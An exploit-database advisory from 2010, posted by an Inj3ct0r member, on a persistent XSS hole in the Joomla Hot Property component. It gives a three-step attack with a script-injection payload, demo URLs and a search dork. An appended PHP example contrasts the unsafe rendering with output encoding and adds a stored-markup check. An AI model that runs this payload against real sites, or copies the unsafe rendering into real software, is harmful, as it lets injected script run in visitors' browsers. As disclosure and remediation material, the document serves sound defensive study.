
Joomla Component com_hotproperty Persistent XSS Vulnerability

Posted on 24 July 2010

=============================================================
Joomla Component com_hotproperty Persistent XSS Vulnerability
=============================================================

[ASCII-art Inj3ct0r banner omitted]
Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

##########################################
I'm Sid3^effects member from Inj3ct0r Team
##########################################

Name : Joomla com_hotproperty Persistent XSS Vulnerability
Date : July 24, 2010
Critical Level : HIGH
Vendor URL : http://www.mosets.com/hotproperty/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
Dork : inurl:com_jomestate

Special thanks to : r0073r (inj3ct0r.com), L0rd CruSad3r, MaYur, MA1201, KeDar, Sonic, gunslinger_ :D
Greetz to : www.topsecure.net, SeeMe, **RoAd_KiLlEr**, indoushka, Sn!pEr.S!Te, all ICW members, my friends, Hack0wn and Milw0rm :D luv y0 guyz

#######################################################################################################

Description:
Now you can list and manage your properties easily using Hot Property together with the best open source Web Content Management System - Joomla!. Your property can be Real Estate, Automobile, Boats, Painting, Books or anything at all! If you wish to showcase your products effectively, Hot Property is your answer. With Hot Property, you can:
- Run a Real Estate website
- Run a Vacation Rentals website when you buy the optional Availability Extension
- Run an Auto website
- Run a DVDs website

###############################################################################################################

Xploit : Persistent XSS Vulnerability

Step 1 : Register and go to your panel, add a new property :P
DEMO URL : http://demo.mosets.com/hotproperty/index.php?option=com_hotproperty&task=addprop&Itemid=26

Step 2 : Insert your evil XSS scripts in the fields
Attack Pattern : "><script>alert("inj3ct0r")</script>

Step 3 : Now go and check the home page or check your property.
DEMO URL : http://demo.mosets.com/hotproperty/index.php?option=com_hotproperty&Itemid=26

Screenshot : http://img812.imageshack.us/img812/6825/proper.png

###############################################################################################################

# 0day no more # Sid3^effects # Inj3ct0r.com [2010-07-24]
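The three steps above describe a classic stored XSS: a property field is saved as submitted and later written into the listing page without output encoding, so the `">` at the start of the attack pattern closes the surrounding attribute and the script runs for every visitor. The following PHP is an added example, not Hot Property's or Joomla's own code; the field names, the sample record and the helper names (`render_property_unsafe`, `render_property_safe`, `h`, `looks_like_markup`) are constructed for illustration. It places the vulnerable rendering pattern beside the output-encoding fix a Joomla template author would apply, and adds a small check an incident responder can run over already-stored records.

```php
<?php
// Added example (not Hot Property's own code): the stored-XSS pattern the
// advisory describes, beside the output-encoding fix a Joomla template should
// apply. Field names and the sample record are constructed for illustration.

// Constructed sample record, as it would be stored after Step 2 of the
// advisory: the submitter used the advisory's attack pattern as the name.
$property = [
    'name'    => '"><script>alert("inj3ct0r")</script>',
    'address' => '1 Example Street',
];

// Vulnerable pattern: the stored field is concatenated straight into HTML.
// The leading "> closes the href attribute and the <a> start tag, and the
// browser then parses and executes the injected <script> element.
function render_property_unsafe(array $p): string
{
    return '<a href="/property?name=' . $p['name'] . '">' . $p['name'] . '</a>';
}

// Hardened pattern: every untrusted value is HTML-encoded at the point of
// output. ENT_QUOTES encodes both ' and " so a value cannot terminate the
// attribute it sits in; ENT_SUBSTITUTE and the charset argument keep
// malformed multibyte input from silently producing an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_property_safe(array $p): string
{
    // A value placed in a URL query component is first URL-encoded, then the
    // whole attribute value is HTML-encoded like any other output.
    $href = '/property?name=' . rawurlencode($p['name']);
    return '<a href="' . h($href) . '">' . h($p['name']) . '</a>';
}

// Detection aid: after the fix is deployed, records stored while the hole
// was open still hold raw markup. This flags values containing tag syntax
// so they can be reviewed and cleaned.
function looks_like_markup(string $value): bool
{
    return (bool) preg_match('/<\s*\/?\s*[a-z][^>]*>/i', $value);
}

echo "Unsafe rendering:\n", render_property_unsafe($property), "\n\n";
echo "Safe rendering:\n", render_property_safe($property), "\n\n";
echo "Stored value needs review: ", looks_like_markup($property['name']) ? 'yes' : 'no', "\n";
```

Run it with `php` from the command line to see the two renderings side by side. The safe output contains the submitted text verbatim as visible characters but no live tags, which is the property a template fix has to achieve; the check in `looks_like_markup` is deliberately broad (it flags any tag-like text) because a reviewer would rather triage a few false positives than miss a stored payload.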
